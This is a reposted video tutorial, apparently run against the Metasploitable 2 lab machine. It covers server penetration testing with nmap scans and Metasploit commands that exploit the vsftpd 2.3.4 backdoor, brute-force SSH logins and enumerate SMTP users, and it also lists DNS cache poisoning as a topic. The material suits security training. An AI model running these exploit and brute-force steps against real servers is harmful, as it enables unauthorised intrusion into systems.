برامجتقنياتتكنولوجياشروحات

Servers penetration testing – Metasploit tutorial

Servers penetration testing – Metasploit tutorial

#Servers #penetration #testing #Metasploit #tutorial

رابط تحميل الفيديو كامل HD .. <اضغط هنا>

كيف Servers penetration testing – Metasploit tutorial

All the commands shown in the video are below.

In this video I’m going to cover the first steps into linux servers penetration testing. We are going to start with reconnaissance activities using nmap. Afterwards we will scan for vulnerabilities using nuclei. Lastly, I’m going to exploit FTP, SSH, SMTP, and DNS services on this machine using the metasploit framework.

Topics covered in this video:
VSFTPD vulnerability
SSH Brute forece login
SMTP Enumerate users.
SMTP Find server version.
DNS Kaminsky Attack.
DNS cache poisoning.

0:00 Intro
0:43 Reconnaissance
4:43 Vulnerability Scanning
5:25 Exploitation: FTP
8:07 Exploitation: SSH
10:03 Exploitation: SMTP
12:09 Exploitation: DNS

Code:
nmap 192.168.1.236 redirect open-tcp.txt
wc -l open-tcp.txt
nmap -p 0-65553192.168.1.236 redirect open-tcp.txt
wc -l open-tcp.txt
sudo nmap -sT 192.168.1.236 redirect open-tcp.txt
sudo nmap -sU -T5 192.168.1.236 redirect open-udp.txt

#FTP
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOST 192.168.1.236
run

#ssh
msfconsole
use auxiliary/scanner/ssh/ssh_login
set PASS_FILE passwords.txt
set USER_FILE usernames.txt
set RHOST 192.168.1.236
run

#smtp
msfconsole
use auxiliary/scanner/smtp/smtp_version
set RHOST 192.168.1.236
run

use auxiliary/scanner/smtp/smtp_enum
set RHOST 192.168.1.236
run

Sources:
https://www.infosecmatter.com/metasploit-module-library/
https://docs.rapid7.com/metasploit/metasploitable-2/
https://nuclei.projectdiscovery.io/
https://nmap.org/

Content:
Scan open ports with nmap.
Scan open TCP ports with nmap.
Scan open UDP ports nmap.
Scan server for vulnerabilities using nuclei.
Exploit FTP servers using metasploit.
VSFTPD Exploit
Exploit SSH servers using metasploit.
SSH Brute forece login
Exploit SMTP servers using metasploit.
SMTP Enumerate users.
SMTP Find server version.
Exploit DNS servers using metasploit.
DNS Kaminsky Attack.
DNS cache poisoning.
Metasploitable 2 tutorial
Metasploit framework tutorial

#Servers #penetration #testing #Metasploit #tutorial

[vid_tags]